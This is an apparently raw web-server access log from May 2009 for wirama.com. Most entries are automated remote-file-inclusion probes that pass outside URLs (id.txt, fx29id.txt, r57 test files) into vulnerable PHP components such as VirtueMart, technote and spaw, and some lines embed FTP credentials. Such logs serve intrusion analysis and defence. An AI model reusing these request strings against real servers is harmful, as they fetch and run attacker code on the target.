74.124.194.104 - - [01/May/2009:09:42:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.124.194.104 - - [01/May/2009:09:42:52 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.124.194.104 - - [01/May/2009:09:42:52 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
78.108.81.31 - - [01/May/2009:09:46:07 -0700] "GET /logs/scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
78.108.81.31 - - [01/May/2009:09:46:07 -0700] "GET /scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
78.108.81.31 - - [01/May/2009:09:47:30 -0700] "GET /scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
78.108.81.31 - - [01/May/2009:09:47:30 -0700] "GET /logs/scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
61.19.241.61 - - [01/May/2009:09:47:59 -0700] "GET /scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
61.19.241.61 - - [01/May/2009:09:47:59 -0700] "GET /logs/scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
61.19.241.61 - - [01/May/2009:09:48:05 -0700] "GET /logs/scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
61.19.241.61 - - [01/May/2009:09:48:05 -0700] "GET /scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
74.124.194.104 - - [01/May/2009:09:53:46 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:08:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:08:12 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:08:12 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:08:39 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?hl=en&q=wirama&sourceid=navclient-ff&rlz=1B3GGGL_enUS312US312&ie=UTF-8&aq=h" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:09:26 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:09:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:09:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:09:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:09:32 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5" "www.wirama.com"
206.169.229.170 - - [01/May/2009:10:09:35 -0700] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:10:28 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.62.61.45 - - [01/May/2009:10:12:06 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [01/May/2009:10:12:06 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
82.151.132.176 - - [01/May/2009:10:18:28 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://olesya.biz/aJz.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.151.132.176 - - [01/May/2009:10:18:28 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.151.132.176 - - [01/May/2009:10:18:28 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.151.132.176 - - [01/May/2009:10:19:47 -0700] "GET /logs/access_090301.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.54.239.74 - - [01/May/2009:10:20:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:10:20:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:10:20:05 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:25:15 -0700] "GET /scanhttp://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:25:15 -0700] "GET /logs/scanhttp://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:25:15 -0700] "GET /logs/access.log/scanhttp://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:25:49 -0700] "GET /scanhttp://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:25:49 -0700] "GET /logs/scanhttp://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:25:49 -0700] "GET /logs/access.log/scanhttp://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
218.185.20.88 - - [01/May/2009:10:28:48 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [01/May/2009:10:28:49 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [01/May/2009:10:28:49 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.62.61.45 - - [01/May/2009:10:29:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [01/May/2009:10:29:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
218.185.20.88 - - [01/May/2009:10:29:29 -0700] "GET /logs/access_090301.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.116.84.254 - - [01/May/2009:10:32:56 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.84.254 - - [01/May/2009:10:32:56 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.84.254 - - [01/May/2009:10:32:57 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:37:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:37:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:10:37:08 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.139 - - [01/May/2009:10:38:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.139 - - [01/May/2009:10:55:29 -0700] "GET /?M=A HTTP/1.0" 200 900 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
74.54.239.74 - - [01/May/2009:10:57:38 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:10:57:38 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:10:57:38 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:11:00:28 -0700] "GET /logs/access.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.237.201.58 - - [01/May/2009:11:04:44 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/May/2009:11:04:44 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/May/2009:11:05:19 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/May/2009:11:05:19 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
74.213.164.118 - - [01/May/2009:11:07:11 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swingerpuebla.com/plugins/system/pda/scanner/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
74.213.164.118 - - [01/May/2009:11:07:11 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swingerpuebla.com/plugins/system/pda/scanner/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
95.168.170.105 - - [01/May/2009:11:07:45 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.diga-pro.es/r57/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
122.116.178.20 - - [01/May/2009:11:12:14 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:11:12:14 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:11:12:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:11:17:52 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:11:17:52 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:11:17:52 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.121.112.152 - - [01/May/2009:11:20:25 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.121.112.152 - - [01/May/2009:11:20:25 -0700] "GET /logs/access_090301.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.116.178.20 - - [01/May/2009:11:30:47 -0700] "GET /logs/access.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:11:36:49 -0700] "GET /logs/access.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.213 - - [01/May/2009:11:43:20 -0700] "GET /?S=A HTTP/1.0" 200 900 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
82.151.132.176 - - [01/May/2009:11:44:13 -0700] "GET /logs/access_090331.log%20%20//skin/zero_vote/ask_password.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.151.132.176 - - [01/May/2009:11:44:13 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://olesya.biz/aJz.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.151.132.176 - - [01/May/2009:11:44:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.29.159.130 - - [01/May/2009:11:52:27 -0700] "GET /slogin_lib.inc.php?slogin_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
195.137.160.91 - - [01/May/2009:12:01:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.91 - - [01/May/2009:12:01:20 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.91 - - [01/May/2009:12:01:20 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.91 - - [01/May/2009:12:04:59 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.91 - - [01/May/2009:12:04:59 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.137.160.91 - - [01/May/2009:12:04:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
204.11.53.20 - - [01/May/2009:12:07:44 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://abaaa.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
204.11.53.20 - - [01/May/2009:12:07:44 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://abaaa.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
202.157.181.40 - - [01/May/2009:12:18:35 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.wirama.com"
202.157.181.40 - - [01/May/2009:12:18:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:12:23:02 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1951 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:12:23:02 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:12:23:02 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
86.122.170.50 - - [01/May/2009:12:24:00 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
86.122.170.50 - - [01/May/2009:12:24:00 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
86.122.170.50 - - [01/May/2009:12:24:00 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1951 "-" "Mozilla/5.0" "www.wirama.com"
202.157.181.40 - - [01/May/2009:12:27:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
65.55.104.10 - - [01/May/2009:12:38:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.104.10 - - [01/May/2009:12:38:21 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:00:11 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:00:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:00:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
200.213.0.1 - - [01/May/2009:13:01:14 -0700] "GET /logs/access_090331.log//login.php?dir=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "wirama.com"
200.213.0.1 - - [01/May/2009:13:01:14 -0700] "GET /login.php?dir=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "wirama.com"
200.213.0.1 - - [01/May/2009:13:01:14 -0700] "GET /logs//login.php?dir=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "wirama.com"
207.57.79.26 - - [01/May/2009:13:06:38 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:06:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:13:06:39 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
65.254.63.210 - - [01/May/2009:13:06:44 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
